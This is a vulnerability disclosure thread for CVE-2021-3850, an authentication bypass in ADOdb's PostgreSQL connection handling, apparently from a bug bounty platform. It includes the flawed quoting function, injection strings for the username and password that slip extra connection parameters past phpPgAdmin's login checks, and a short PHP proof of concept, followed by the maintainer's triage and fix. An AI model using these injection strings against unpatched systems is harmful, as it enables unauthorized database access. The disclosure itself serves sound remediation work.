Authentication Bypass by Primary Weakness in adodb/adodb


Reported on

Oct 28th 2021


An attacker can inject values into the PostgreSQL connection string by bypassing adodb_addslashes() . The function can be bypassed in phppgadmin for example by surrounding the username in quotes and submitting with other parameters injected in between.

Proof of Concept

I'm going to use phppgadmin as an example of a project that this effects.

When a user goes to login the username and password are passed to this function before reaching pg_connect()

function adodb_addslashes($s)
    $len = strlen($s);
    if ($len == 0) return "''";
    if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted

    return "'".addslashes($s)."'";

An attacker can login with a username of: 'testinguser' host='' and the phppgadmin will login but be connected to .


In the context of phppgadmin getting past the login panel opens up a lot more possibilities for functions to exploit. It can also reveal the backend IP of a server. I was unable to find anything other than the host parameter to inject into the connection string that was interesting.

This bypass also allows an attacker to use default logins that would otherwise be blocked in phppgadmin (the password part here could by bypassed by using '' lol='' as a password)

$bad_usernames = array('pgsql', 'postgres', 'root', 'administrator');
$username = strtolower($server_info['username']);  
if ($server_info['password'] == '' || in_array($username, $bad_usernames)) {  
   $msg = $lang['strlogindisallowed'];  
We created a GitHub Issue asking the maintainers to create a 2 years ago
Damien Regad
2 years ago


Many thanks for the report.

I can confirm the vulnerability, which goes all the way back to the oldest version of the PostgreSQL driver I have in the ADOdb repository (4.65 / 2005).

I'll now check how to properly address the issue.

With regards to your POC, for the record and as far as I can tell, phpPgAdmin are using a customized (and therefore unsupported), very old version of ADOdb so they will have to patch their code manually once I fix this.

include '';
$db = ADONewConnection('pgsql');

$host_good = 'localhost';
$user_good = 'user';
$password = 'xxxx';
$database = 'dbname';

$user_evil = "'user' host=''";

$db->connect($host_good, $user_good, $password, $database); // success
$db->connect($host_good, $user_evil, $password, $database); // !!!
Damien Regad validated this vulnerability 2 years ago
meme-lord has been awarded the disclosure bounty
The fix bounty is now up for grabs
2 years ago


Ok, I'll send them a separate report once there's a fix although they have yet to respond to my other reports.

Damien Regad
2 years ago


Did you or are you planning to request a CVE-ID for this ? If so, let me know the number, otherwise I can take care of it.

How would you like to be credited for the finding ?

2 years ago


I have not applied for a CVE for this. I would like to be credited as Emmet Leahy of Sorcery Ltd. I'll request on the CVE to add a link to a writeup on my blog or something after it's fixed.

Damien Regad
2 years ago


@admin Submitting a patch using my fork of the repository will effectively make it (and the vulnerability) available to the general public...

Is there some way to submit a patch in a more private manner ?

The alternative would be to just delay submitting the patch to you until hotfix releases are out, but I'd prefer to give the researcher a chance to test and confirm it effectively addresses the issue.

Jamie Slome
2 years ago

@dregad - thanks for your question! πŸ‘

Once a fix has been confirmed against the report, it will be made public. This is done using the confirm fix button on the page.

I can see that you have already discussed this partially with Adam over Chatwoot, and so will go ahead and assign a CVE number for this report.

Once you are ready to publish this report and the CVE, let us know, so we can make both the CVE & report visible.

Jamie Slome
2 years ago

CVE-2021-3850 has now been assigned to this report! 🎊

Let me know if you have any further questions @dregad, and happy to support.

Damien Regad
2 years ago


I thought this would be a good opportunity to test Github's Security Advisories feature which, as I have just found out, allows to create a private repository to collaborate on the patch without disclosing it.

@meme-lord can you please confirm that you are using the same user ID on Github (and if not, give me your Github username) so I can grant you access to the temporary private repo ?

2 years ago


My Github username is meme-lord, same as here

Damien Regad marked this as fixed in 5.20.21 with commit 952de6 2 years ago
Damien Regad has been awarded the fix bounty
to join this conversation